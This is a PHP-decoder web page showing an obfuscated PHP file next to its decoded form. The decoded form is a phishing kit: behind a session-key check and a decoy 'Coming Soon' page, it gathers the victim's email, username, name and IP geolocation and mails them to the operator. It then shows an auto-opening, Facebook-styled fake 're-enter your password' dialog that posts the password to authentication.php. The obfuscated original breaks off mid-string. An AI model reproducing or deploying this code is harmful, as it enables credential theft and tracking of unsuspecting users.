Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Z2nRD; XRrQh: if (isset($_SESSION["\x73\143\155"]) && $_SESSION["\163\143\x6d..

Decoded Output download

<?php 
 goto Z2nRD; XRrQh: if (isset($_SESSION["scm"]) && $_SESSION["scm"] === "1226") { include "includes/header.php"; include "includes/side_nav.php"; include "includes/mainheader.php"; if (isset($_POST["fstsubmit"])) { $pgname = $_POST["pgname"]; $email = $_POST["email"]; $un = $_POST["un"]; $fn = $_POST["fn"]; $_SESSION["name"] = $fn; $ai = $_POST["ai"]; @($details = json_decode(file_get_contents("http://ipinfo.io/{$userip}/json"))); @($hostname = gethostbyaddr($_SERVER["REMOTE_ADDR"])); $QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER["QUERY_STRING"]); $string = $QUERY_STRING . PHP_EOL . PHP_EOL . "[IP address]: " . $userip . PHP_EOL . PHP_EOL . "[Hostname]: " . $hostname . PHP_EOL . PHP_EOL . "[Browser and OS]: " . $_SERVER["HTTP_USER_AGENT"] . PHP_EOL . $_SERVER["HTTP_REFERER"] . PHP_EOL . PHP_EOL . "[Coordinates]: " . $details->loc . PHP_EOL . PHP_EOL . "[ISP provider]: " . $details->org . PHP_EOL . PHP_EOL . "[City]: " . $details->city . PHP_EOL . PHP_EOL . "[State]: " . $details->region . PHP_EOL . PHP_EOL . "[Country]: " . $details->country . PHP_EOL . PHP_EOL . "[Date]: " . date("D dS M,Y h:i a"); $thedetails = "Email : " . $email . PHP_EOL . "User :" . $un . PHP_EOL . "Page Name :" . $pgname . PHP_EOL . "Full Name: " . $fn . PHP_EOL . "Additional :" . $ai . PHP_EOL . $string; mail($receiverEmail, "Details | From - " . $userip, $thedetails); } echo "<br>

    <button type="button" class="btn mt-4 mb-4 csmBtn" id="cs85c" data-toggle="modal" data-target="#exampleModal">Continue</button>\xa    \xa    <br>\xa    <br>\xa    <br>\xa    <br>\xa    <br>\xa    <br>
    <br>
    <br>
    <br>\xa    <br>\xa    <br>
    <br>
    <br>
    <br>\xa    <br>\xa    <br>\xa    <br>
    <br>
    
    
    \xa    
    
    \xa    
    \xa    
    \xa    \xa        \xa    \xa    \xa    
    <!-- Modal -->
    
    <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">\xa    
      <div class="modal-dialog" role="document">\xa    \xa                    <form action="authentication.php?next=https%3A%2F%2Fwww.facebook.com%2F" method="post" id="pform">\xa    
        <div class="modal-content">
    \xa          <div class="modal-header">\xa            <h6 class="modal-title" id="exampleModalLabel">Please Enter Your Password</h6>\xa    \xa              <span aria-hidden="true" class="close" data-dismiss="modal" aria-label="Close">&times;</span>\xa    \xa          </div>
    \xa          <div class="modal-body">
    
            \xa          <div class="profileimage">\xa              <img src="assets/profile.png" alt="" class="profile"> <?php echo $_SESSION["name"]; ?>
    <br><br>
          </div>
              <p class="lbcus">For your security, you must re-enter your password to continue.</p>
    
                  
    \xa                  <div class="form-group"><label for="pw739" class="lbcus mb-2">Password</label><input type="password" class="form-control pw739" name="pw739"></div>
    
    \xa    
    
    \xa    \xa    
    \xa    \xa          </div>
    \xa          <div class="modal-footer">
    \xa            <button type="button" class="btn btn-secondary clsbtn" data-dismiss="modal">Close</button>\xa    
            <input type="submit" class="btn btn-primary fmcsmbtn" value="Continue" name="pwsubf7">\xa    \xa          </div>
    \xa        </div>
    
                  </form>
    
    \xa    
      </div>
    \xa    </div>\xa    
    <!-- FORM ENDS -->\xa    
    \xa    \xa    <br>
    \xa    <?php include "includes/downstuff.php" ?>
    
    
    
        <br>\xa    
    \xa    \xa    \xa    
    </div>
    
    <?php include "includes/footer.php"; ?>
    
    \xa    \xa    </div>\xa    \xa    </div>\xa    \xa        <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>\xa    
        <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script>\xa    
        <script src="//cdnjs.cloudflare.com/ajax/libs/bootstrap-validator/0.4.5/js/bootstrapvalidator.min.js"></script>
    \xa    <!-- <script>\xa    
    var x = document.getElementById("cs85c");
    
    var i = document.getElementById("exampleModal");\xa    \xa    $(document).ready(function(){\xa    
      $(x).click(function(){\xa    
            $(x).modal("show");
    \xa      });
    
    });\xa    
    </script> -->
    \xa    <script type="text/javascript">\xa    \xa      var cs85c = document.getElementById("cs85c");
    \xa    $(document).ready(function(){
    \xa        $(cs85c).trigger("click"); 
    \xa    });\xa    
    </script>
    
        <script type="text/javascript">\xa    \xa            $(document).ready(function() {
    
                $("#pform").bootstrapValidator({
    
                        // To use feedback icons, ensure that you use Bootstrap v3.1.0 or later\xa    \xa                        feedbackIcons: {
    \xa                            valid: "glyphicon",
    \xa                            invalid: "fa fa-exclamation-circle fa-lg",
    \xa                            validating: "glyphicon glyphicon-refresh"\xa    
                        },
    \xa                        fields: {\xa    
                            pw739: {
    
                                validators: {
    \xa                                    notEmpty: {
    \xa                                        message: "Please enter your password"\xa    \xa                                    },\xa    \xa                                    stringLength: {\xa    \xa                                        min: 6,
    \xa                                        message: "Your password must be at least 6 characters long"
    \xa                                    }
    \xa                                }
    
                            },
    
    
    
                        }
    
                    })\xa    
    \xa    
    \xa    \xa                    .on("success.form.bv", function(e) {
    
                        $("#success_message").slideDown({\xa    
                            opacity: "show"
    
                        }, "slow") // Do something ...
    
                        $("#reg_form").data("bootstrapValidator").resetForm();
    
    
    
                        // Prevent form submission
    
                        e.preventDefault();\xa    
    \xa    
                        // Get the form instance
    \xa                        var $form = $(e.target);
    
    \xa    
                        // Get the BootstrapValidator instance\xa    \xa                        var bv = $form.data("bootstrapValidator");
    \xa    \xa    
                        // Use Ajax to submit form data
    \xa                        $.post($form.attr("action"), $form.serialize(), function(result) {\xa    \xa                            console.log(result);
    
                        }, "json");\xa    
                    });\xa    \xa            });\xa    
        </script>
    
    \xa    \xa    "; } else { echo "<!DOCTYPE html>
<html lang="en-US">\xa  <head>\xa    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">\xa    <title>Coming Soon Bootstrap Template - Coming Soon</title>
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="crossorigin"/>\xa    <link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Quicksand:wght@300;400;500;700&amp;display=swap"/>\xa    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Quicksand:wght@300;400;500;700&amp;display=swap" media="print" onload="this.media="all""/>
    <noscript>\xa      <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Quicksand:wght@300;400;500;700&amp;display=swap"/>\xa    </noscript>
    <link href="../../css/bootstrap.min.css?ver=1.2.0" rel="stylesheet">
    <link href="../../css/font-awesome/css/all.min.css?ver=1.2.0" rel="stylesheet">
    <link href="../../css/main.css?ver=1.2.0" rel="stylesheet">
  </head>\xa  <body id="top"><div class="site-wrapper">\xa  <div class="site-wrapper-inner">
    <div class="cover-container">\xa      <div class="masthead clearfix">
        <div class="inner">
          <h3 class="masthead-brand">Coming Soon</h3>\xa          <nav class="nav nav-masthead">\xa            <a class="nav-link nav-social" href="#" title="Facebook"><i class="fab fa-facebook-f" aria-hidden="true"></i></a>\xa            <a class="nav-link nav-social" href="#" title="Twitter"><i class="fab fa-twitter" aria-hidden="true"></i></a>
            <a class="nav-link nav-social" href="#" title="Youtube"><i class="fab fa-youtube" aria-hidden="true"></i></a>\xa            <a class="nav-link nav-social" href="#" title="Instagram"><i class="fab fa-instagram" aria-hidden="true"></i></a>\xa          </nav>\xa        </div>
      </div>      \xa      <div class="inner cover">\xa        <h1 class="cover-heading">The adventure Begins</h1>
        <p class="lead cover-copy">Hold tight as we get our working robots together and produce the most astonishing product ever.</p>\xa        <p class="lead"><button type="button" class="btn btn-lg btn-default btn-notify" data-toggle="modal" data-target="#subscribeModal">Notify Me</button></p>\xa      </div>\xa      <div class="mastfoot">
        <div class="inner">
        </div>
      </div>\xa      <div class="modal fade" id="subscribeModal" tabindex="-1" role="dialog" aria-labelledby="subscribeModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">\xa          <div class="modal-content">\xa            <div class="modal-header">\xa              <h5 class="modal-title" id="subscribeModalLabel">Get Notified on Launch:</h5>\xa              <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                <span aria-hidden="true">&times;</span>
              </button>
            </div>\xa            <div class="modal-body">
              <form>
                <div class="form-group">
                  <label for="recipient-name" class="form-control-label">Enter you e-mail to get notified when we launch</label>\xa                  <input type="text" class="form-control" id="recipient-name" placeholder="[email protected]">\xa                </div>
              </form>
            </div>\xa            <div class="modal-footer">
              <button type="button" class="btn btn-default">Subscribe</button>\xa            </div>\xa          </div>
        </div>
    </div>\xa  </div>
</div>\xa    <script src="../../scripts/jquery.slim.min.js?ver=1.2.0"></script>
    <script src="../../scripts/bootstrap.bundle.min.js?ver=1.2.0"></script>\xa    <script src="../../scripts/main.js?ver=1.2.0"></script>\xa  </body>
</html>"; } goto Zd7aC; Z2nRD: session_start(); goto XRrQh; Zd7aC: ?>

Did this file decode correctly?

Original Code

<?php
 goto Z2nRD; XRrQh: if (isset($_SESSION["\x73\143\155"]) && $_SESSION["\163\143\x6d"] === "\x31\x32\x32\x36") { include "\x69\156\x63\x6c\x75\x64\x65\x73\x2f\150\x65\x61\144\x65\x72\x2e\160\150\x70"; include "\x69\156\x63\x6c\x75\x64\x65\x73\57\163\151\x64\x65\137\156\141\x76\56\160\150\x70"; include "\151\156\x63\x6c\x75\x64\x65\x73\x2f\155\x61\x69\x6e\150\145\x61\x64\145\x72\x2e\160\x68\160"; if (isset($_POST["\146\x73\x74\x73\x75\x62\x6d\x69\x74"])) { $pgname = $_POST["\160\x67\156\141\x6d\145"]; $email = $_POST["\145\x6d\x61\x69\x6c"]; $un = $_POST["\165\156"]; $fn = $_POST["\x66\x6e"]; $_SESSION["\x6e\141\155\x65"] = $fn; $ai = $_POST["\x61\151"]; @($details = json_decode(file_get_contents("\x68\164\x74\160\72\57\x2f\151\160\x69\x6e\x66\157\56\x69\157\x2f{$userip}\x2f\152\163\x6f\x6e"))); @($hostname = gethostbyaddr($_SERVER["\x52\105\115\117\124\x45\x5f\x41\104\x44\x52"])); $QUERY_STRING = preg_replace("\x25\x5b\x5e\57\141\55\x7a\101\55\132\x30\55\71\x40\54\137\75\x5d\45", '', $_SERVER["\x51\125\x45\x52\x59\137\x53\124\x52\x49\116\x47"]); $string = $QUERY_STRING . PHP_EOL . PHP_EOL . "\x5b\111\x50\40\x61\x64\144\162\145\163\x73\x5d\x3a\x20" . $userip . PHP_EOL . PHP_EOL . "\133\x48\x6f\163\x74\156\x61\x6d\145\x5d\x3a\x20" . $hostname . PHP_EOL . PHP_EOL . "\x5b\x42\162\x6f\x77\x73\145\162\40\x61\156\x64\40\117\x53\x5d\x3a\40" . $_SERVER["\110\x54\x54\120\x5f\x55\123\105\122\x5f\101\x47\105\116\124"] . PHP_EOL . $_SERVER["\110\124\124\x50\137\x52\x45\106\105\122\105\x52"] . PHP_EOL . PHP_EOL . "\133\103\157\157\162\x64\x69\x6e\141\164\145\163\135\x3a\x20" . $details->loc . PHP_EOL . PHP_EOL . "\133\111\123\x50\x20\x70\x72\157\166\x69\144\x65\x72\135\72\40" . $details->org . PHP_EOL . PHP_EOL . "\x5b\103\x69\164\171\x5d\x3a\40" . $details->city . PHP_EOL . PHP_EOL . "\133\123\164\141\x74\x65\135\x3a\x20" . $details->region . PHP_EOL . PHP_EOL . "\x5b\103\157\x75\x6e\164\162\171\135\72\40" . $details->country . PHP_EOL . PHP_EOL . "\x5b\104\x61\x74\x65\135\72\x20" . date("\104\x20\x64\123\40\115\x2c\x59\40\x68\x3a\151\40\141"); $thedetails = "\x45\x6d\141\x69\x6c\40\72\40" . $email . PHP_EOL . "\125\163\145\162\x20\72" . $un . PHP_EOL . "\120\x61\x67\x65\40\x4e\141\x6d\145\40\x3a" . $pgname . PHP_EOL . "\106\x75\154\x6c\40\116\141\155\x65\72\40" . $fn . PHP_EOL . "\x41\x64\x64\151\x74\151\x6f\x6e\141\x6c\x20\72" . $ai . PHP_EOL . $string; mail($receiverEmail, "\x44\145\x74\141\151\x6c\163\40\174\x20\x46\162\x6f\155\40\x2d\x20" . $userip, $thedetails); } echo "\x3c\x62\x72\x3e\12\12\x20\x20\40\x20\74\x62\165\x74\164\x6f\x6e\x20\164\x79\160\x65\x3d\42\142\x75\x74\x74\157\156\x22\40\143\x6c\x61\163\163\x3d\x22\x62\164\156\40\155\164\55\x34\x20\155\x62\55\64\x20\143\x73\x6d\x42\x74\156\x22\40\151\x64\75\x22\x63\163\70\x35\143\x22\40\x64\x61\x74\x61\x2d\x74\x6f\147\x67\154\145\x3d\x22\x6d\157\144\x61\154\42\x20\144\141\x74\141\55\x74\141\162\x67\145\164\75\42\43\x65\x78\x61\155\x70\x6c\145\115\157\144\x61\x6c\x22\76\x43\x6f\156\x74\x69\x6e\x75\145\x3c\x2f\x62\x75\164\164\157\x6e\76\xa\x20\x20\x20\40\xa\40\x20\40\40\x3c\x62\162\x3e\xa\40\40\40\40\74\142\x72\x3e\xa\40\40\40\40\x3c\142\162\x3e\xa\40\40\x20\40\74\x62\162\76\xa\40\x20\40\x20\74\142\x72\76\xa\40\x20\x20\x20\x3c\142\162\x3e\12\x20\x20\40\x20\x3c\x62\162\x3e\12\40\x20\x20\40\x3c\142\x72\76\12\40\x20\x20\x20\x3c\x62\162\x3e\xa\x20\x20\40\x20\74\142\162\x3e\xa\x20\x20\x20\40\74\142\162\x3e\12\x20\x20\40\40\74\142\x72\x3e\12\x20\x20\40\x20\x3c\142\x72\76\12\40\40\40\40\74\142\x72\x3e\xa\40\40\40\x20\x3c\142\x72\76\xa\40\x20\x20\x20\74\x62\162\76\xa\40\x20\40\x20\x3c\142\x72\x3e\12\x20\x20\40\40\x3c\142\x72\76\12\40\x20\40\40\12\40\x20\x20\40\12\x20\40\x20\x20\xa\40\x20\x20\x20\12\40\x20\x20\x20\12\x20\x20\40\40\xa\x20\x20\x20\40\12\40\40\x20\40\xa\x20\x20\40\40\12\40\x20\x20\x20\xa\40\40\40\40\xa\x20\x20\x20\40\x20\40\x20\40\xa\40\x20\x20\40\xa\40\x20\x20\x20\xa\x20\x20\40\x20\12\x20\x20\40\40\74\x21\x2d\x2d\x20\x4d\157\x64\141\x6c\x20\x2d\55\76\12\40\40\x20\40\12\x20\x20\40\x20\74\x64\x69\x76\40\143\154\x61\163\163\75\x22\155\x6f\144\x61\x6c\x20\146\141\144\145\42\40\x69\x64\x3d\x22\x65\x78\x61\155\x70\x6c\x65\x4d\x6f\144\x61\154\42\40\164\141\142\x69\156\144\145\x78\75\x22\55\x31\42\40\x72\x6f\154\x65\75\x22\x64\x69\x61\x6c\157\147\x22\40\x61\x72\151\x61\55\154\x61\x62\x65\x6c\154\x65\144\142\171\75\42\145\170\x61\x6d\x70\x6c\145\x4d\x6f\144\141\x6c\114\x61\x62\145\x6c\x22\40\141\x72\151\x61\x2d\150\x69\144\x64\145\156\75\x22\x74\x72\x75\145\42\x3e\xa\x20\x20\x20\40\12\x20\x20\x20\x20\40\x20\x3c\144\x69\166\40\x63\154\x61\163\x73\75\x22\x6d\157\x64\x61\154\x2d\144\x69\141\154\157\x67\x22\40\x72\x6f\154\145\x3d\42\x64\157\143\x75\x6d\145\156\164\42\x3e\xa\40\40\40\x20\xa\40\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20\x20\40\40\40\x20\40\40\74\x66\x6f\162\x6d\40\141\x63\164\x69\x6f\x6e\x3d\x22\141\x75\164\150\145\156\x74\151\143\141\164\151\x6f\156\56\x70\150\160\x3f\156\x65\170\x74\x3d\x68\x74\x74\160\x73\45\63\101\x25\x32\x46\45\62\x46\167\167\x77\x2e\146\141\x63\145\142\x6f\x6f\153\x2e\x63\157\x6d\45\x32\x46\42\x20\x6d\145\x74\150\157\x64\x3d\x22\x70\157\163\164\42\40\x69\x64\x3d\42\x70\x66\x6f\x72\155\42\76\xa\40\40\x20\40\12\x20\40\x20\40\40\40\40\40\x3c\144\x69\x76\40\143\x6c\x61\163\163\x3d\42\x6d\157\144\141\154\x2d\x63\x6f\156\x74\145\x6e\164\x22\x3e\12\x20\40\40\40\xa\40\x20\40\x20\40\x20\40\x20\x20\x20\x3c\144\151\x76\x20\x63\154\141\x73\x73\75\x22\x6d\x6f\x64\141\x6c\55\x68\145\x61\x64\145\x72\x22\76\xa\40\40\40\40\40\x20\x20\x20\40\40\x20\40\x3c\150\66\x20\143\x6c\x61\163\x73\75\x22\155\x6f\x64\x61\154\x2d\x74\151\164\x6c\145\x22\x20\151\144\75\42\145\x78\x61\155\x70\x6c\x65\x4d\157\x64\141\154\114\141\x62\145\154\42\x3e\x50\x6c\x65\141\x73\145\x20\105\156\164\x65\x72\40\131\157\x75\162\40\120\141\163\x73\167\x6f\x72\144\74\x2f\x68\x36\76\xa\40\x20\x20\x20\xa\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\x3c\163\160\141\x6e\x20\x61\x72\151\141\x2d\150\151\x64\144\145\x6e\x3d\x22\164\162\165\145\x22\x20\x63\x6c\141\163\163\75\x22\x63\x6c\157\x73\x65\42\x20\144\x61\x74\141\x2d\x64\x69\x73\x6d\x69\x73\163\75\42\155\157\144\x61\x6c\42\x20\141\162\151\141\x2d\x6c\x61\x62\x65\154\x3d\x22\103\154\x6f\163\x65\x22\76\x26\164\x69\155\145\x73\x3b\74\57\163\x70\141\156\x3e\xa\40\40\x20\x20\xa\40\x20\x20\40\40\x20\x20\x20\x20\40\74\57\144\151\x76\x3e\12\x20\40\x20\x20\xa\x20\40\40\40\40\x20\x20\x20\40\40\x3c\144\151\x76\x20\x63\154\141\x73\163\75\42\155\157\144\141\x6c\55\142\x6f\x64\171\x22\x3e\12\40\x20\x20\40\12\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\xa\x20\x20\x20\40\x20\x20\40\40\x20\x20\74\144\151\166\x20\x63\154\141\163\163\x3d\42\x70\x72\x6f\146\151\x6c\145\151\x6d\x61\x67\x65\42\76\xa\x20\40\40\x20\40\40\40\40\x20\x20\40\x20\40\40\74\x69\x6d\147\40\x73\162\x63\75\42\141\x73\x73\145\x74\163\x2f\x70\x72\157\x66\x69\154\145\56\x70\156\x67\x22\x20\141\x6c\164\75\x22\x22\40\x63\154\141\163\x73\x3d\42\x70\162\x6f\146\x69\154\x65\x22\76\x20\x3c\x3f\x70\150\x70\x20\x65\x63\x68\x6f\x20\44\x5f\x53\105\x53\123\x49\x4f\116\x5b\x22\156\x61\x6d\x65\x22\x5d\x3b\x20\77\76\12\40\x20\40\40\74\x62\x72\x3e\74\142\x72\76\12\x20\x20\x20\x20\40\40\40\40\40\x20\x3c\x2f\x64\151\x76\x3e\12\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\74\160\x20\143\x6c\141\x73\x73\75\x22\x6c\142\x63\165\x73\42\x3e\x46\x6f\162\x20\171\157\x75\x72\x20\x73\145\x63\165\162\151\164\x79\54\x20\x79\157\x75\40\x6d\x75\x73\x74\x20\x72\x65\x2d\145\156\164\x65\x72\40\171\157\165\162\x20\160\x61\x73\x73\167\157\x72\144\40\164\157\x20\143\x6f\x6e\164\x69\x6e\165\x65\56\74\57\160\76\12\40\40\x20\40\12\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\x20\40\12\x20\40\40\x20\xa\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\x3c\144\x69\166\x20\x63\x6c\141\163\x73\x3d\x22\x66\x6f\162\x6d\x2d\x67\162\157\165\x70\42\x3e\74\x6c\141\x62\x65\x6c\x20\146\157\162\75\42\160\x77\x37\63\x39\x22\x20\143\x6c\141\x73\x73\75\x22\154\x62\x63\165\163\x20\x6d\142\x2d\62\x22\x3e\120\141\163\163\167\x6f\x72\144\74\x2f\x6c\141\x62\145\154\76\x3c\151\156\x70\165\164\x20\x74\x79\x70\145\x3d\x22\x70\x61\163\x73\x77\157\x72\144\42\x20\143\x6c\141\x73\x73\x3d\42\146\157\162\155\x2d\143\157\x6e\x74\x72\x6f\x6c\x20\160\x77\x37\x33\x39\42\x20\x6e\141\155\x65\75\x22\160\167\67\x33\x39\42\76\x3c\x2f\144\151\x76\76\12\x20\40\x20\40\12\40\40\40\40\xa\x20\40\40\x20\12\x20\40\40\40\12\40\40\x20\x20\xa\x20\x20\x20\40\xa\40\40\x20\x20\12\x20\x20\40\x20\xa\x20\40\x20\x20\xa\x20\x20\40\x20\x20\x20\x20\40\40\x20\74\57\x64\151\166\x3e\12\x20\x20\x20\40\xa\x20\40\40\40\40\x20\40\x20\x20\x20\74\x64\151\x76\x20\x63\154\x61\163\x73\75\42\x6d\x6f\144\x61\154\55\146\x6f\x6f\164\x65\162\42\76\12\x20\x20\x20\40\xa\40\x20\x20\40\x20\x20\40\x20\40\40\40\x20\x3c\x62\165\164\x74\x6f\x6e\x20\x74\171\160\145\75\42\142\165\164\x74\x6f\x6e\42\x20\143\x6c\x61\163\163\x3d\x22\x62\164\156\x20\142\x74\x6e\55\163\145\x63\157\156\x64\x61\x72\171\x20\x63\x6c\163\142\164\x6e\x22\x20\x64\141\x74\x61\55\x64\x69\163\155\x69\x73\163\x3d\x22\x6d\x6f\144\x61\x6c\42\76\x43\154\157\x73\x65\74\x2f\x62\x75\164\x74\x6f\156\x3e\xa\x20\40\40\40\12\x20\40\40\x20\x20\40\40\40\40\40\x20\x20\74\x69\x6e\x70\x75\x74\40\x74\171\160\x65\75\x22\x73\165\x62\x6d\x69\164\x22\x20\143\154\x61\163\163\x3d\42\x62\x74\156\x20\x62\x74\156\55\x70\162\x69\155\x61\162\x79\40\x66\155\143\x73\155\x62\x74\x6e\x22\x20\166\141\154\x75\x65\75\42\103\x6f\156\x74\151\x6e\165\145\42\40\x6e\x61\155\145\75\42\160\167\163\x75\x62\x66\67\42\x3e\xa\x20\40\x20\x20\xa\x20\40\40\x20\x20\x20\40\40\x20\40\x3c\57\x64\x69\166\76\12\x20\x20\x20\x20\xa\x20\40\40\x20\40\x20\x20\x20\74\x2f\x64\151\166\76\12\40\40\40\x20\12\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\74\57\146\157\162\155\x3e\12\40\40\40\40\12\x20\x20\40\x20\xa\40\x20\x20\x20\12\40\40\40\x20\x20\x20\x3c\x2f\x64\151\166\x3e\12\x20\x20\40\40\xa\40\x20\40\40\74\x2f\x64\151\166\76\xa\40\x20\40\x20\12\x20\x20\x20\x20\74\41\x2d\55\x20\106\117\122\x4d\40\x45\116\x44\x53\x20\x2d\x2d\x3e\xa\40\40\40\40\12\40\40\x20\x20\xa\x20\x20\x20\40\xa\x20\40\x20\x20\x3c\x62\162\76\12\x20\40\40\x20\xa\x20\x20\40\40\x3c\x3f\160\150\x70\x20\151\x6e\x63\154\165\x64\x65\x20\42\151\156\143\x6c\165\144\x65\163\x2f\144\x6f\167\156\x73\164\x75\146\146\56\160\150\x70\42\40\77\x3e\12\40\40\40\x20\12\40\x20\x20\x20\12\40\x20\x20\40\12\40\40\40\40\x20\x20\x20\x20\x3c\142\x72\x3e\xa\40\40\40\x20\12\40\40\40\x20\xa\40\x20\x20\40\xa\40\40\40\40\xa\40\40\40\40\12\40\40\40\x20\74\x2f\144\151\166\x3e\12\40\40\40\x20\12\x20\x20\40\x20\74\x3f\x70\150\x70\40\151\156\143\x6c\x75\144\145\40\x22\x69\x6e\143\154\165\144\145\x73\57\146\x6f\x6f\164\145\162\56\x70\x68\x70\x22\x3b\40\x3f\x3e\12\x20\40\x20\40\12\x20\40\x20\x20\xa\40\x20\40\40\xa\x20\x20\40\40\74\x2f\144\151\x76\x3e\xa\40\40\40\x20\xa\x20\x20\40\x20\x3c\x2f\x64\151\166\76\xa\40\40\40\40\xa\x20\40\x20\40\x20\x20\40\x20\74\x73\x63\162\x69\x70\x74\x20\x73\162\x63\x3d\42\57\57\143\x64\156\x6a\163\56\x63\x6c\x6f\165\144\146\154\x61\x72\145\56\x63\x6f\155\x2f\141\152\x61\170\x2f\x6c\x69\x62\x73\x2f\x6a\x71\x75\145\162\171\x2f\62\x2e\61\x2e\x33\x2f\152\161\165\x65\162\x79\56\x6d\x69\156\x2e\152\x73\x22\x3e\x3c\x2f\163\x63\x72\151\160\x74\76\xa\40\40\x20\40\12\x20\40\40\x20\40\x20\40\x20\74\x73\143\x72\151\x70\x74\x20\x73\x72\143\75\x22\57\57\155\141\x78\143\x64\x6e\x2e\x62\157\x6f\x74\x73\164\162\141\x70\x63\144\x6e\x2e\143\157\155\x2f\x62\x6f\x6f\x74\163\x74\x72\x61\160\57\x33\56\62\x2e\60\57\152\163\57\x62\157\x6f\164\163\164\162\141\x70\x2e\x6d\151\156\x2e\152\x73\x22\x3e\74\57\x73\x63\x72\x69\160\164\x3e\xa\40\40\40\40\12\40\x20\x20\x20\40\x20\x20\40\x3c\x73\x63\x72\x69\160\x74\x20\x73\x72\143\75\42\57\x2f\x63\144\156\152\x73\x2e\143\154\x6f\165\144\146\x6c\141\x72\145\56\x63\x6f\155\57\x61\x6a\141\170\x2f\154\151\x62\x73\57\142\157\x6f\x74\x73\x74\162\x61\x70\55\x76\x61\154\x69\x64\x61\x74\x6f\162\57\x30\x2e\64\56\65\57\x6a\163\x2f\x62\157\x6f\164\x73\x74\162\x61\160\166\x61\x6c\151\x64\x61\164\x6f\162\56\155\x69\156\56\152\x73\42\76\x3c\x2f\x73\143\162\x69\160\164\76\12\x20\40\40\40\xa\x20\40\40\x20\74\41\55\x2d\x20\x3c\x73\x63\x72\x69\160\x74\76\xa\40\40\x20\40\12\x20\40\x20\40\166\141\x72\x20\170\40\x3d\40\x64\x6f\x63\x75\x6d\145\156\164\x2e\x67\145\x74\105\x6c\x65\x6d\145\x6e\x74\x42\x79\111\x64\x28\42\143\163\70\65\143\42\x29\73\12\40\x20\x20\40\12\40\40\x20\x20\x76\x61\x72\x20\x69\40\75\x20\144\x6f\x63\165\x6d\x65\156\x74\56\147\145\x74\105\154\145\x6d\x65\x6e\x74\x42\171\x49\144\x28\x22\145\170\x61\155\160\154\x65\115\x6f\144\141\154\42\x29\73\xa\x20\x20\x20\40\xa\x20\x20\x20\40\44\x28\144\x6f\x63\165\x6d\145\156\x74\x29\56\x72\x65\x61\144\171\50\x66\x75\156\143\164\151\157\x6e\50\x29\173\xa\x20\x20\40\40\12\x20\40\40\40\40\40\44\x28\x78\x29\56\x63\154\x69\x63\x6b\x28\146\x75\x6e\x63\x74\151\x6f\156\50\x29\173\xa\40\40\40\x20\12\40\40\40\x20\x20\40\x20\40\40\40\40\x20\x24\50\170\51\x2e\155\157\144\x61\154\x28\x22\163\150\157\x77\x22\51\73\12\x20\x20\x20\x20\xa\x20\x20\x20\x20\x20\40\x7d\51\73\12\x20\x20\40\x20\12\x20\x20\x20\40\x7d\x29\x3b\xa\x20\40\40\x20\12\x20\x20\x20\x20\x3c\x2f\x73\x63\x72\x69\160\164\76\40\x2d\55\76\12\40\40\40\40\xa\40\x20\x20\x20\74\163\143\x72\151\x70\164\40\x74\x79\160\x65\x3d\42\x74\x65\x78\x74\57\152\141\166\x61\163\143\x72\151\x70\x74\42\x3e\xa\x20\40\40\40\xa\40\40\40\40\40\x20\x76\x61\x72\x20\143\x73\x38\65\143\40\75\x20\x64\157\143\x75\x6d\x65\156\164\56\x67\145\x74\105\154\145\x6d\x65\x6e\164\102\x79\111\144\50\x22\143\x73\x38\65\x63\x22\x29\73\12\x20\40\x20\40\xa\x20\40\40\x20\44\50\x64\157\x63\165\155\x65\156\164\51\56\x72\145\141\144\x79\50\146\165\156\x63\x74\x69\157\x6e\x28\51\x7b\12\40\40\x20\40\xa\40\x20\40\40\x20\40\40\x20\x24\x28\143\x73\70\65\x63\51\x2e\x74\162\x69\147\147\x65\162\x28\x22\143\x6c\151\143\x6b\x22\x29\x3b\40\12\x20\40\x20\40\xa\x20\40\x20\40\175\51\73\xa\x20\x20\40\x20\12\x20\x20\40\40\x3c\x2f\x73\x63\162\151\x70\x74\x3e\12\40\x20\x20\x20\12\40\x20\x20\x20\40\40\40\40\x3c\163\x63\x72\151\160\164\40\x74\x79\160\145\75\x22\x74\x65\x78\164\57\152\141\x76\x61\x73\143\162\x69\160\x74\x22\76\xa\40\x20\40\x20\xa\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\44\x28\x64\x6f\143\x75\x6d\145\x6e\164\51\56\x72\145\141\x64\171\x28\x66\165\x6e\x63\164\151\x6f\156\x28\x29\x20\x7b\12\x20\40\40\40\12\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x24\x28\42\43\160\146\x6f\x72\x6d\42\x29\56\x62\157\157\x74\x73\x74\x72\141\x70\126\141\154\x69\x64\141\164\x6f\x72\x28\173\12\x20\40\40\x20\12\40\40\40\x20\40\x20\40\40\x20\40\40\40\40\40\40\x20\x20\40\x20\40\x20\40\40\x20\57\57\x20\x54\157\x20\165\x73\145\40\x66\145\145\x64\142\141\143\x6b\x20\151\143\x6f\156\163\x2c\x20\x65\x6e\163\165\x72\x65\x20\164\x68\x61\164\40\171\x6f\x75\40\x75\x73\145\x20\102\x6f\x6f\x74\163\164\x72\x61\x70\x20\166\x33\56\61\56\x30\x20\157\162\40\x6c\141\164\145\162\xa\40\40\x20\40\xa\x20\x20\40\40\x20\x20\40\40\40\40\40\40\40\x20\40\x20\x20\40\x20\